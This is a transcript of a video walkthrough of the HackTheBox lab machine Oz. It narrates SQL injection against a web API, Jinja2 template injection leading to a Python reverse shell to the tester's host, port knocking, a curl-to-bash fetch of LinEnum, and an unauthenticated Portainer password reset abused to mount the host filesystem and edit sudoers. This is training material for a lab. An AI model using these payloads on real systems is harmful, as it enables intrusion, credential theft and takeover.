What's going on YouTube? This is Ipsec. I'm doing Oz from HackTheBox, and this box was all about like web APIs and understanding it. It starts out with fuzzing a custom application to poke at a web API that leads you to a SQL injection. You get on the box, you do some cool things with SQL, move around the Docker containers, get to the host OS, which is running an application called Portainer, which has a JSON API, and the developers forgot to harden the route that allowed you to set passwords. So if unauthenticated users just made a API request to change a password, it went through. And that is a relatively common thing you see in a lot of applications. If you can map out the API and just check out all the routes, you normally won't get to like a password reset things, but you'll get extended functionality that you may be able to chain into a cool exploit. So with all that being said, let's just jump in. As always, we start with the NMAP with -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the NMAP direct and call it Oz, and then the IP address, which is 10.10.10.96. This can take some time to run, so I've already run it. Looking at the results, we have just two ports open, 80 and 8080. They're both HTTP services, and the service, or the server that is running the HTTP service, is that Zarg for both of them. They are different pages because we can see the HTTP title is different. This is GBR support-login, and this is Oz web API. The odd thing I note is NMAP says the method supported for this one is connection, and there's no method supported for the web API. So let's go and send these over into burp. So to do that, I have to go to the page, have burp on, go over to burp. I'm going to press Control-R twice, and then we're going to click on this edit target button, put 8080, and now that will go to the GBR login page. So we can just label this GBR, go here, label this web API, and click go. So we can see the web API responds with Oz web API, please register a username, and GBR redirects us to /login. If we follow that redirection, we got a bunch of gibberish. That's odd. Click go a few times, and we also have please register a username. And odd, it's always responding with 200 OK. It lost port 8080. So this happened because I was lazy and I modified the target, so where a browser is going to is 8080. I didn't modify the host header. Put this as 8080, and we get the page. If we take away /login, we see it is redirecting us to where our host header is /login. So if we put this to the host of please subscribe and then click go, it refers us to please subscribe /login. So that's how that redirection's working. No real vulnerability, just some interesting notes of how, I guess, HTTP works. So let's go over to the web API and do an options, because NMAP didn't tell us what options it supported. We just see head options and get. Go over to the GBR page and do options. We have head, get, post options. So this is odd that both of these appear to be running on the same server but have different configurations. One allows post and the other doesn't. If we send a post request to this, we get you have no power here, and it's still saying 200 OK. We're not getting any like 404s, 403, whatnot, any error messages. So this is going to make it difficult when we do some type of GoBuster, because GoBuster depends on these HTTP results like 200 to identify pages. And if it's only going to be 200, GoBuster is not going to be able to identify what's a valid page and what is not. Whenever dealing with APIs, I also add this content type thing, or header, and we'll do like application JSON, and see if the application has a different logic if it's accepting JSON, because a lot of web APIs work over JSON. Another thing is XML, so we can try XML, and we still get you have no power. So I'm going to ignore doing post requests, and let's go back to HTTP requests. And let's play with this, see if we can get this 200 OK to not be 200 OK. So let's give it a totally not a valid page, and put a bunch of numbers on the end of it so we know this doesn't exist. Get a bunch of junk, 200 OK, click go again, 200 OK, and please register username. So it looks like there's some weird logic that every now and then it sends a bunch of junk. Going into the decoder tab, try to decode this as like base 64, doesn't decode. We have a bunch of things that aren't valid hex, like that H, KKWZ, so we know it's not like hex encoded. Don't know what that is, not going to play with it too much, but let's go and try to find a way to do a DIRBust or fuzz this web service to identify what's valid page and what is not. So let's go over back into a terminal and run GoBuster with -u for URL, HTTP 10.10.10.96, and -w for word list, user share word list, DIRBuster, then directory list 23 medium.txt. And we see it says a wildcard response found. It's saying this page that definitely doesn't exist, respond with 200 OK. So I can't identify pages because everything's saying 200. You can do the -fw to ignore that logic, and we see everything's responding with status 200. We can do -l for length and see if we get a bunch of random lengths because, again, every now and then it responded with random gibberish. So GoBuster cannot be used here. Before I go on more, I'm going to do SQLMap on the port 8080 because I always like having some type of recon going in the background while I work. So let's go back to the repeater tab, go to GBR. Actually, let's just go back to Firefox. Disable burp temporarily. Go to port 8080. Go to burp. Let's clear a intercept queue and try logging in with like admin. Invalid login. Let's turn on burp. Admin. Go here. Let's copy this to a file. We're in the Oz directory, so let's do gbr login.request. Save this. Go over here. SQLMap. I think --batch makes it so it always chooses default options. We'll see. -r for request. Load this. And it's not asking us anything, so it's just going to try and SQL inject this. Awesome. So that's running in the background. Let's go back and enumerate the web API. So a GoBuster doesn't work. So let's try wfuzz, a different tool to fuzz HTTP applications. The syntax is going to be pretty much the same. It's going to be -u for URL, HTTP 10.10.10.96, -w for word list, user share word list, DIRBuster, directory list 23 medium.txt. If we click go, we have to say where we want to fuzz. So I want to fuzz right there. And wfuzz just says, hey, put capital fuzz in all caps. And when I see that, I'm going to replace it with everything. And we have wfuzz stopping after about 13 or 14 requests consistently. That is odd. Let's look at this file and see what happens after all these comments. Go here. And we have an empty line. Get rid of this empty line. Try wfuzz again. And there we go. So wfuzz is going until it sees a blank line, which is a bit annoying. But let's look at all the requests that have been made. So everything's responding in a 200. Everything so far has a 0 length. There's multiple words on the page, either 1 or 4. And then the character count does change quite rapidly. So what if we just show everything that has not a length of 0? So if we do --, I think HL for hide length of 0, click go. We get the lengths of 3 when it begins with a comment, and then we get a length of 3 with users. This comment is, I guess, it's used for anchor text. So when you put a comment to a page, it's going to ignore that. So all of these requests are just going to slash the root. And this is responding with that web API login thing, and users does the same exact thing. So let's go back into a repeater tab, the web API, get on /users, it's all lowercase, click go, It responds with this. Let's put a slash on the end to make it a proper directory. Still says, please register a username. Let's take a username that probably exists and get users admin. Click go. And we get username admin. So this is behaving like a typical REST API. And the fact that the very first slash, this is going to be calling what function it goes to or what route the application takes. And then what's after this is the arguments it passes. So we're going to the user's route and then passing it the argument admin. So we can try putting some type of SQL injection here. If we do like a single tick, let's see what happens. We get a 500 server error. So let's do single tick and a comment. Still server error, and I did plus because I'm URL encoding a space, because if we do a space, it's not going to work. This is invalid HTTP request, and then it births. The other way to do a space is %20. If we click go here, we get username admin again. So this definitely looks like it is going to be SQL injectable. So we could try doing like users admin or 1 is equal to 1. I'm going to put a single quote here because I know the application has a single quote to end it. Otherwise, this wouldn't cause it to error out. So we do that. And we get username is equal to Dorothy. We don't get admin anymore because now we're just getting the very first user in the database. Because we're saying, hey, go into this user function and get us where the username is either equal to admin or 1 equals 1. And 1 equals 1 is always going to return true, so it returns the very first user. We could do 1 equals 1 %20 to add a space, limit 1 comma 1. Now we have to do the comment at the end. Let's see, I screwed something up. I don't have a space after limit. This gets very ugly to look at. And we get Tin Man. That's the second user. So this is going to be the line number, and this is the number of results returned. If we do 2, we get Dorothy, but let's always do 1 there. So we always get 1 result. The second user in the database is Tin Man. The third user in the database is Wizard Oz. The fourth user is Coward Lion. I've never seen Wizard of Oz, so that's probably pronounced it wrong. It's probably Lion. Misspelled. But anyways, I say this is the fourth user, even though I'm typing 3, because again, it starts at 0. So we definitely have SQL injection there. Let's send this over into SQLMap. And SQLMap, if you put a star, it's going to automatically inject there. So let's copy the file. We'll do web API user.request. And let's go back into our SQLMap window. We see it has finished and says the GBR login page doesn't look like it's SQL injectable. So let's do the SQLMap-r on the web API file. We see the custom injection marker star has been found in the option. Do you want to process it? Of course we do. Just ignore the WAF detection and let this go and see if it finds a union injection. We could have just specified like -- technique space U because we know it's union injectable, but it's not going to take that long to figure this out. There we go. URI parameter 1 is generic injectable. Don't keep processing. And now let's just do a -- dump. Click yes. And we're getting stuff dumped. So we have the tickets GBW. We have reissued new IDRSA and IDRSA.pub keys for SSH access to Dory. Monkeys, note to self, Toto, nothing to see here. And then this looks like base64, so let's do echo-n and send that to base64-decode. What did you expect? Nothing interesting there. Think of a better secret knock for the front door. Doesn't seem that secure. A lion got in today. So maybe some type of port knocking here. We got 4034 here, so maybe something's there. Won't read the next entry. Made you look. Dorothy should be able to find her keys in the default folder under home Dorothy on the database. Seriously though, more base 64, so let's check this out. Nothing there, wasting time. So the key things to note, I guess, are we have IDRSA for Dorothy, and the keys are under home Dorothy on the database server. So SQLMap does have a -- file read, and we can do home Dorothy. We'll try .ssh ID_RSA and see if it reads it. Confirmation, let's see. If we try to cat this file, we get a encrypted private key. So we could send this and try to start decrypting it, but the password, I believe, is relatively secure. We'll get it later on this box. I'll show other ways to get this file key. If we wanted to, we could go back into burp and do like users admin, what is it? We have to do the union inject, so union select all 1, and we'll do it like this. Let's see, does this work? No, let's see. Admin union select all %20 1. So let's do ABC. Did not work. Let's try querying a invalid user with that union. So if we do ipsec here, now we can control this. So, yep, we control the output. We can do user and then a comment. Let's specify %20. Click go. The database uses Dorothy at 10.110.6. So that's interesting right off the bat. We know we're in some type of virtualization because we're going to 10.10.10.96 and this IP is different. But we can do, I think it's load file, and then, what is it? Home Dorothy .ssh ID RSA. Click go. Please register a username, so that is wrong. Let's see. Let's just put this in hex. So let's go Python 3, import bin ASCII. What is it? Bin ASCII dot hexlify home Dorothy SSH ID RSA. We have to make this a bytes-like object. So we got a hex string. Go back to burp. Replace this load file with 0x and then that hex string. Click go. And we get the key here. So that's all SQLMap's doing is a union, select, all, and then load file, and then the file name. So I believe this SQLMap calls typecasting or cast or something, but easy way to get MySQL to load a string without using quotes, because quotes can sometimes be bad characters. So that's that. Let's see, where were we? Let's go back to the SQLMap. Oh, I know. Not cat that. CD SQLMap output 10.10.10.96 dub CD OSDB. And the reason why I'm ignoring that SSH key because we don't have any SSH windows open. So let's cat the users, and we have a bunch of hashes. So let's go to hashcat example hashes. We gotta disable burp. I just moved this window a little bit. There we go. And we want, let's see, this hash. It's definitely not Cisco. Even though this word matches up, the hash doesn't. It's not beginning with $8. Go again, Django, and this looks like it's going to be it. So let's awk and then print, I think that's 4, maybe 3. There we go. Now we got only the hashes. So I'm going to go into my Kraken, which has hashcat loaded on it. Go into hashcat, and the hashes. Let's create the file oz. And then hashcat -m, I think it was 10,000, hashes oz opt word list rock_u. No hashes loaded, token line length. So let's look at the hashes I put in. Copy Django's. Whoops. Copy Django's. What the hell? Copy. Paste. There we go. Okay. So this looks slightly different. We have... This one doesn't begin with $1. And instead of a hyphen, it is an undercase. So... my vfu is screwing with me right now. There we go. So let's try this again. Still line length exemptions. So maybe that's not the one. So let's go back to this. And I say that because if we look at Django's, its lengths are completely different. It's using a different iteration count, which probably doesn't matter. But its salt is really short compared to this salt, and that may be throwing it off. So maybe this isn't Django after all. Let's just search for PBKDF2. And we got PBKDF2 HMAC SHA-256. Copy this one. Paste it. And make this look like that. So let's see. That's 1, 2, 3, 4, 5, 6. 6 characters. I miscounted 7 characters. Okay. And then we just have to replace the dollar signs with colons. So %s. Place dollar with colon. There we go. And let's try this. And this number is 10,900. And that looks better. It's no longer immediately erroring out. We got a few tokens that failed, 1, 2, 4, and 6, but it looks like 3 and 5 are going to be cracking. Looking at the speed, oh, we already got one. We got Wizard of Oz 22 for this hash, the one that begins with BCD. So let's copy this. And we don't want that awk anymore. So we can grep for, not Wizard of Oz, BCD. And we see wizard.oz's password is Wizard of Oz 22. So if we go back to this login page and go wizard.oz, paste the password. Do I have a space? Nope. Wizard.oz. That's why it didn't work the first time, but we get into this application. Clicking on these descriptions, we see the RSH key things. So this isn't too interesting because we've already read all these in the SQL dump. While this is going, what we can do is, let's see, go back to SQLMap, dump, was it dash dump? I think there's a dump all, which will go outside of the current database and start dumping. Let's see, test request doesn't exist. This is web API. Let's see, there we go. So now it's going into information schema and MySQL databases. So it'll dump a lot more. So we have stuff going on in the background while we look at this. So going here, we can click this little plus, create a ticket, let's do ipsec was here, submit this ticket, refresh the page, and we didn't see any ticket number. It's still 1 to 12. So that's odd. So let's send this into burp and see if it gave us an error message. So we'll do ipsec was here, click submit, go to burp. Let's see, we don't want this login request. This Firefox, that's junk. There we go. Send this to repeater. We'll call this post login. Click go. And we just see 302 found. And then does nothing. We follow this. And it brings us back to the page. So nothing really there. If we go and Google or go to payload all the things and do template injection, this will give us some things to test. And I'm scrolling down. Twig, this is a PHP template. Jinja2, this is a common Python template. And we know it's Python because the server header. So this is where we kind of begin. So let's try what it says. 7 times 7 would result in 7 sevens. And interesting to note, if you do the same exact command in PHP, it results in 49. So this is kind of how it's typecasting something in quotes. So PHP is saying, hey, you're doing math. Even though you pass this, it kind of looks like a string. I'm assuming you want to do an integer thing. So I'm going to do 7 times 7 there. With Python, it's saying, you know what? This is a string. You told me it. It doesn't look like the thing you just said. So I'm going to print this 7 times. So easy way to identify kind of like what's running on the back end is doing things like that. So if we paste this, we get 7 sevens. So we know this is going to be Python on the back end, as confirmed by the server header. We can verify that PHP does that if we do PHP-A. Whoops, I didn't mean the -s. I think it's echo. Nope. PHP-A, echo 7 times 7. We get 49. 7 times 7 in quotes, we get 49. If we do Python 3, print 7 times 7, 49. 7 times 7 with quotes, and a bunch of sevens. So just a small difference between Python and between PHP and Python that helps us identify what the server is running in the back end. And of course, because it didn't print this exact string out, we know we have code injection. So go back to this payload all the things. We have a bunch of Jinja2. We have a remote file read. So let's try reading this etc past wd. So description, paste this in. And we have the description with the contents of the file. So now we can read files. Let's see what else there is. There's remote code execution. So let's copy this into text where we can actually read it easier. Code exec. So this is ugly. All this is doing is writing to the file, and it's going to write this string into the file. So from subprocess import check output, run cmd. And then you make another request that imports that file. So it's importing something in the config. And then doing a config run command and passing that, what you imported, into it. So we go back to burp and enumerate the config with just config. Click go. It's not exactly pretty. We may be able to send this to decoder and smart decode this. And then copy this back into a Vim, paste, %s, replace commas with new line, and we can see the config. And it looks like I didn't revert this box from when I was testing it. So we see one of my configs is already there. So I'm going to remove that, and we'll create something else with that. So let's create the file. Let's go back here, copy this very first line, and instead of doing like a command injection thing, like this is creating the function run cmd, and then run cmd is going to execute anything. I guess we can do that real quick. We'll just paste everything in default. So go into repeater. We'll start with the very last one to prove this one just didn't work at first. So we'll do run command, who am I? Click go, internal server error. So we know this function doesn't exist yet. So let's copy this, paste this in. We don't need that comment. Click go, none. Then go back to the page, get that second one, paste this in. So now we're loading the file we wrote into the config. And then to wrap it all up, we do this run cmd. And then instead of this bash, we want who am I? And now we can run commands on this box. So we can do ifconfig, click go, and we see this box's IP is 10.100.10.2. So that is one way to do the command injection. Generally with these templates, I don't like leaving something just complete open command execution. I'd rather like lock it off by putting an IP address, just because you kind of introduce a major vulnerability in the application that may just get picked up luckily or something. So to prevent other people from using your code, I generally like putting a reverse shell here, because unless they control the IP, then it's not going to do anything. So let's go to reverse shell cheat sheet. Go to the pentest monkey. Let's go to Pythons. We can just copy this, go back into a terminal, and this is what we wrote. So let's paste this. And then if we escape that, put it all in one line, put this in one line, change the IP from 10.0.0.1 to 10.10.14.2, I think is my IP address. If we do ifconfig ton 0, yep, 10.10.14.2, and we'll do port 9001. So let's copy this line, paste this in to burp, paste, and instead of calling this evil config, we'll call this please subscribe. Set and go. We get nothing. So let's just read this file real quick. Payload all the things. Let's see. Dump all used. Read file. Paste this. We'll do temp please subscribe.cfg. Click go. And it looks like a file, maybe it doesn't exist because it URL encoded some things is odd, but that could be on the output. So it could be just preventing like cross-site scripting. It's not stored in the disk this way. So I'm going to import this anyways and see what happens. So let's copy this second one. Paste this in. Please subscribe.cfg. And let's start a reverse shell. So nclvmp 9001, click go. We don't get a response back, but we get a shell. So again, that was just on the output doing HTML ND encoding. I think that's what it's called, or HTML encoding dangerous characters that are used for cross-site scripting. So now we are on the server. If we do who am I, we are root. So I'm going to do python-c import pty, pty spawn bin bash. No such file or directory. Let's copy this. Bin sh. I forgot the single quote. Then background with control Z, stty raw minus echo. Type fg, hit enter. And now we got a shell where we have tab autocomplete. We can control C and do whatnot. So got a good shell now. Let us do an if config. We are 10.110.2. If we do an erp-an to do erp all and then don't do DNS, we see we talk to 10.110.1 and 10.110.4. So the first thing I'm going to do is netcat-zv, which just means only connect, then disconnect afterwards, and do verbose so I can see if you connect. So 10.110.1 on port 22. We don't see a connection. Let's do 10.110.4 on port 22. We don't get a connect, but it's not immediately dropping us. Where this one, the packet just hangs. But on 4, we get a fin request. So this is a word netcat, or not netcat, NMAP would say filtered or open, because on port 22, on 10.110.4, this is closed. This is obviously closed. We send a request. We're getting a response back. It's not saying it's open because it sent us that fin request. But if we go to 10.110.1, we're just waiting. We never get a response back. So this one is filtered. So we can ignore all that. Let's see. Are there any creds in the actual application? If we go into ticketer, let's cat auth.py. I don't see creds here. Cat database.py. And we get PyMySQL, dorthy, no place like home. So if we ping dorthy -c1, we're not getting any response back. It's doing MySQL, so let's go back to our netcat and do 3306, which is SQL's port. 10.110.1 just hangs. 10.110.4, we get an open request. So now we know this port is open. We can do a MySQL -u dorthy -p and then -h to specify the host name. 10.110.4. And then let's copy this password because it's going to ask us for it. Paste the password in, and we get a MySQL prompt. So we can do show databases, use OzDB, show tables, select stir from users, GBW, and we can see this is the same exact thing that we had dumped. We could do select load file, etc passwd, and we can read the etc passwd file. So this is exactly where we were with the SQL injection. So this application, the actual code resides in this piece, and then the database is on a different server. If we go into just slash and do a ls-la, we can see .dockerenv, so we know we're inside of Docker. So the actual web application is in a Docker, and then the actual database, most likely a different Docker. If we only saw the one erp of 10.110.1, I may think the database is on the host just because the container is only talking to one IP. So we do have a .secret folder, so let's check what's in here. We got nocd.config, and read this. We have 3 UDPs, and then we see the start command is ufw allow from IP to any port 22, and we got one for delete. So let's go nc dash zvu. So we don't need the v, we just need z and u. Then 10 10 10 96 40 809 50212, then 46969, and then we get rid of the UDP and do 22. If we do ZV, we see it did connect before and then it closed. We got a timeout of 10, so this is only open for 10 seconds. So let's split the pane again. And there is a program called knockd that you could use. I'm fine just using Linux scripts. So for in 4809 50212 46969, do nc-zu 10 10 10 96 I done. And then nc-z 10 10 10 96 22, and always do that -v so you can see we do connect and it's open. But we don't have the SSH key yet. So let's see. Let's go into app. Let's cat the Docker file. And nothing really there. We got maintainer insider threat in Mumbai. Let's go into ticketer. And let's cat the database.py and try Dorothy's password for this SSH key. And I didn't actually save the SSH key, so let's go up a few times. MySQL, enter the password, select, load file, home, Dorothy, .ssh id rsa, and we can copy this and go v dorothy.sh.enc, paste. Then I always like doing OpenSSL RSA input, Dorothy, output, and removing the password from this SSH key because I hate having to type passwords when I SSH with keys. Probably not the wisest thing, but it is nice. And we see it didn't give us an error message, and now this key just isn't encrypted anymore. So that is the same password used on the database as this key. So if we do this netcat again, SSH, where is it? We can just do sh-i dorothy.sh 10 10 10 96 dorothy at, let's see, and we get into Oz. So if we do wc-c on user.txt, we can see it is 33 characters long, which is the length we were expecting for that file. The first thing I'm going to do is run lin enum against this. So opt lin enum python-m simple HTTP server, and we can curl 10 10 14 2 port 8000 lin enum.sh, pipe that over to bash, and then let this run. And I didn't do this on the Docker containers because the Docker container we were already root, so it didn't really matter. So let's go to the top and scroll down and see what we have. The kernel's built in 2018, so chances are we're not supposed to do a kernel privesc. Hostname is Oz. User group. We have my login from SSH. Groups. We have some admin users. Etsy passwd. Nothing interesting. Super user account root. Duh. We have Docker commands we can run. We can do Docker network ls and inspect stir. So I'm going to end the thing right there. And since a lot of this was Docker stuff, I'm assuming we want to do Docker things. So let's do that user bin docker network ls and inspect stir. So sudo docker ls network, I think. Just do sudo -l docker network ls sudo, and we can see we have a few network adapters: bridge, host, net, prodnet. So we can do network inspect on them. I don't have my up key, so sudo docker network inspect prodnet, and we see 3 containers: the web API, OzzDB, and the ticket app. So we had a shell here, we have file read here. We haven't had anything on this ticket app page. Oh no, we've had a shell on ticket app, read file on OzzDB, haven't popped web API. So let's look at the other networks we saw. So sudo docker network sudo shell sudo docker network ls, and we got bridge and host. So sudo docker network inspect. I'm just going to copy this. Bridge. And we get a container, Portainer 1.11. And the other one was inspect host. And we have no containers there. So we got a new IP that is Portainer on 172.17.02. So let's see if we can ping this. Okay, we can ping it. And if we look at what Portainer is, it is an actual application. So chances are this is what we probably should be attacking, because it's a Docker management application. And if you can create Docker containers, you can read the root file system, as we'll find out soon. So let's start looking into this Portainer. So if we do ls/ go into containers, cd/containers. This is annoying. You can't do tab autocomplete. We have Portainer 1.11.1 cd into this. Permission denied. LSLA. We can go into every other container but that one. If we look at the run.pys on these containers, let's see. Cat run.py. That's not what I wanted. We could just try taking these keys and try them as the root password. See if we have any easy wins. Let's cat start.sh. See, nothing there. We can do find -name is equal to start.sh. Okay. Not having this up arrow is really annoying me. Let's cat. Like that. Let's just cat these manually with copy and paste. Look at the web APIs. We don't see anything. And I'm just trying to see if I find any passwords anywhere. Nope. Try the database. We get MySQL root password, super secret pass. So let's just try this. su-. Nothing. So let's go back and start looking at this Portainer 1.11.1. If I remember correctly, it was on the bridge network. So if we do sudo docker network inspect bridge, we get its IP address. And do we have NMAP on this host? we do, so we don't have to worry about doing any type of SSH tunnels to forward NMAP. So, let's just do that in case NMAP wasn't on it. So what I'm going to do is I'm going to type the squiggly capital C, and if you do that on a very new line without hitting any keys, it'll pop up this SSH prompt, and then we can do -D 1080. And that's just like specifying -D 1080 when we were initially SSHing into the box. So we have that port open. So now let's look at proxy chains. It's set to 1080. Okay. Let's not proxy DNS request. And let's turn on quiet mode. And we can do proxy chains nmap-s capital T 10 10 10 96 and -- open. I only want to see open things. And the reason why we do ST is because we want to do full TCP connects, because we can't do a SYN scan. And if we were root on the SSH box, we could do tap adapters to allow us to do a SYN scan, but we're not, so we can't. And this is going to take a while probably. So let's just specify port 9000. That is not open. You should be open. Try port 22. Okay. 9001. Port 8000. That should be good. Let's see. Let's go back to our SSH. Do nmap. Oh, it's 172 whatnot. We have to do that. 172. This is the IP we want. 172.17.02. So let's try port 9000. Try doing -PN. We get that port is open. If we do other ports, they are closed. So we know our NMAP is now successfully configured to go through proxy chains. We could just let this go and see how long this takes. I already renamed to NMAP. And again, well, now this is going to get spammed, because it's doing the NMAP. So we can kill that. You know NMAP's working because we can do 9000. We can try other ports like 22. Not open. So let us go back into our SSH connection. We're going to do that command, the squiggly C thing. Instead of doing -D for dynamic, we're going to do -L 9000 localhost 9000. So now in Firefox, we have the proxy off, and we go to localhost 9000. It's going to go, it should go through our SSH connection, and it will, I keep screwing this up. Let's do -L 9001 to 172, what is it? 1702. On port 9000. So what this is going to do is listen on our local host 9001, and every packet it gets to that, it's going to send it to 172.17.02 on port 9000. So if we do 9001, here we go. We could also just go into a Firefox options, privacy, where is proxy? Proxy, and set a manual proxy for, actually instead of doing it this way, let's do it in Foxy proxy. Options, default, none, let's do add, SOX 5, socks localhost 1080 because we already have that -d open. If we save this and then foxy proxy do this 172.17.0.2 on port 9000, we get Portainer also. So now we have all our tunnels set up to go to Portainer. If we do ls again, we see this is running Portainer version 1.11.1. So I'm just going to copy this, type Portainer 1.11.1. We're going to turn our proxy off. And let's see if there's any exploits. So let's add exploit in our search. Admin passwords can be set multiple times. It's a GitHub issue. And run Portainer, post to API users admin init with JSON password and a password, and then log in. So let's go back to Firefox. We're off. We can do localhost 9001. Send this over to burp. Go to proxy. Refresh. When we get this request, send this to repeater. We can rename this to Portainer. Click go. Not modified. So we sent the wrong request. We want an actual login request. So admin. Click login. Go back to proxy. Send this one in. So the GitHub issue says something, but I got off the page. So let's turn this off. Portainer 1.11 exploit. And it says send it to API users admin init. So API users admin init. And we'll send this as please subscribe. And to prove this is working, we'll go to 9001. Admin, please subscribe. Invalid credentials. Send this. And we get an error message, read only file system. I think something may be screwed up on this box. I may have to revert it. Let's go back to this GitHub request. Post to API users admin init with JSON password and password. API users admin init. I'm just going to revert this box and we'll redo SSH. So let's exit out and revert the box. The box should be reverted, so let's go back and do a port knock and then SSH in once this finishes. SSH in. Okay, we're back on the box. We can do -L 9001 172.17.0.2 on port 9000. Okay. If we go back into burp, well, before we go into burp, let's go back to this. Don't save. Invalid credentials. Click go. 200 OK. So no longer a read-only file system, and we log right in. So now we're on Portainer, and this is much like the LXC privesc, and I think Arachni, another box that did Dockers, had a privesc like this, where you just create a Docker container and you can symlink the root's host file system into a directory, and then you have full access to it. So to do this, we go to add container, and we need to enter the name of this. So we'll call this please subscribe. In the image, let's go to the images to see what ones we can choose from. Please subscribe. Log in. What images can we choose from? Let's do Python 2.7 Alpine. Really doesn't matter which one you choose there, probably. Alpine Linux is just a common Docker Linux build. Restart policy. The console, we want interactive and TTY. And for the volumes, we want to add a path. Whoops. If we click path, we can just do slash. And in the container, we want to mount it into /temp. Or we can do, we'll try /mount. /mount should exist. So this is going to be the roots file system, the containers file system. If we create this container, it's taking a while to create. There we go. We can go to the please subscribe container and click on console. Change this to bin sh because bin bash didn't exist. Do ls. We're here. If we go to /mount, we get another file system, and this is the roots file system. So if we like cat etsy shadow, we can see Dorothy's password is SHA encrypted. We got the roots there, but we can just go into root and do wc-c on root.txt. We can also make dir.sh and copy /mount home dorothy.sh into roots. And then just chmod. Oh, it's already chmod at 600. Let's see, just see if this works now. So we can, if I exit this SSH connection, my whole web's going to die. So let's go up, split this pane, do the port knock again, SSH-I, dorothy.sh, root at 10.10.10.96. Too many S's. Permission denied, public key. So it looks like allow root SSH is disabled. What is it? Oh. Let's see here. So if we go into Etsy, go into SSH and cat SSH deconfig grep for the root, we have permit root login set to no and deny users root. So that's a shame. What we can do is edit the cron tab. So Etsy, we'll do var spool cron tabs, and here's root's cron tab. So we do root 1, 2, 3, 4, 5, and we'll execute temp shell.sh, and then go into temp v shell.sh. Do we have a verse shell cheat sheet up? We do. Let's do, you can try this one. Oh, there's some annoying reset thing. So that Docker container is now dead. We do please subscribe. We see the box restored all the containers to the default state and kicked me out. So add container. Before we do that, we gotta go to images, Python, containers, add. Okay, interactive volumes, add, / add this. Reverse shell cheat sheet. We'll say port 9002. That's been added. Go to containers. Did already revert. That's annoying. Images. Containers. Add. Paste. Interactive volumes. Create this. So we got 5 containers now. So we can go console in, connect, cd mount, we're there, temp, was it shell.sh? And my copy and paste do work. So let's just try this. Okay. Bin sh. Ooh, can't do bash. Or can I do bash here? / mount bin. I probably have bash there. The doc containers don't have bash, so that's what I was saying before. LVNP 9002. We bash temp shell.sh. Temp shell.sh. Mount temp shell.sh. If I can type. Permission denied. chmod 777. So hopefully when the cron executes that, we'll get a shell. So give this probably another 15 seconds, and we'll see if we get a shell. And it does not look like we got a shell. It's been a new minute, so we screwed something up. So let's go back, and we'll probably have to, redo everything. So go to images, copy the container name, and let's create a new container. Paste this in. Interactive TTY, volumes, path, create, and containers. Hasn't been created yet. There we go. We got our annoyed container. We can go into the console, and let's do something a bit easier than just doing the cron. Let's do mount etc sudoers and say dorthy is now allowed to do anything. So we go back to our SSH, sudo-l, syntax error. Let's do bash. Sudo-l, sudo bash. Line 33 has an error. Let's do bin sh. Why do you have an error line? There we go. Sudo bin sh, and now we are root. So, I hope you guys enjoyed that box. Let's go back a little bit, and we'll do a little bit of a learning exercise with the Python SQL injection, in case you didn't want to use like SQLMap. So, open a whole new pane, and think back to the time when we went to this web API thing, and had this SQL injection. So let's just go here and go back to users and admin. The SQL injection was really annoying to show because of all those %20s. It just didn't make it exactly readable. And it's not exactly the quickest thing to do in burp to keep modifying queries, so let's just convert this into a Python exploit. So the first thing we're going to do in Python is going to do the from CMD import CMD, and we're just creating a test command shell that has history support, so you can do up and things like that. So class terminal CMD prompt is equal to this, and then definition for default action self args, and we will print args. Okay, that should be fine. We can do terminal is equal to the class and terminal.cmd loop. So this is just a skeleton exploit. So if we do python test, python 3, forgot a parenthesis, it's now printing whatever we type, and if we hit the up arrow, we can go up and down. So just like a normal terminal, and Control C to exit. If you want to read more about that, you can just do like Python CMD module, and then read this. There's things like if you do underscore, it can have different functions, things like that. But so if we did like def do ipsec self args and print please subscribe. If I execute this again, do help, we already got the undocumented command ipsec. If we type ipsec and put anything, it just says please subscribe. So this is a little handy module. Instead of doing printing things though, we need to do the request module. So we'll do import requests, and we will do r is equal to request.get, and do http 10.10.10.96/users/admins, and then we'll users please subscribe args. Okay, and then just print .text. So we got this, and we chose a user that doesn't exist because that's how we had controlled the union before. And then we just end the SQL, and I'm trying to think if we should. This should be fine. So this will put the variable, whatever we type, in there, and then we comment it off. So if we run this, just hit enter, we get nothing. So we can do union union select 1 ABC. If we put ABC in quotes, we get this. So now we can do user to get a username. We can do or 1 equals 1. Get Dorothy, limit 0, 1, 1, 1, 2, 1, 3, 1. So we can enumerate that way. We can do union select. It's probably password. Union select. Let's see. Can I do nested unions? Yep. Password from, was it ozdb.users probably? So we have to get the actual column names. So to do this, we can just go information, schema, and columns probably. Okay. So we probably want the, let's see, table schema. This is going to be the database name. Then we probably got table name somewhere. Table name, yep. And column name. So we want to do union select concat. We'll do table schema, table name, and column name from information schema dot columns limit 01, and hope this works. We get an error. So let's see, we have an issue somewhere. And whenever we have an issue, oh, we just forgot to probably close this parenthesis. There we go. So we have the very first column, which is in character sets information schema. So we can add a where table schema, not like information schema. Okay, and the next database we have is MySQL. So let's do and table schema not like MySQL. So we got the database OzDB, the table tickets GBW, and the column ID, column name, description. So now we're in the users table. ID, username, password. So we can do select password from ozdb.usersgbw. Let's see. Probably should limit that. Limit 01. Okay. And if we wanted to, we could do concat username. Whoops. So now we got Dorothy, the password. We can go the second one, third one, and so on. So a pretty cool script just to quickly play with SQL injection, and I'd recommend playing with it, learning it, and then pivoting between different databases to get information you want. So hope you guys enjoyed the video. Take care, and I will see you all next week.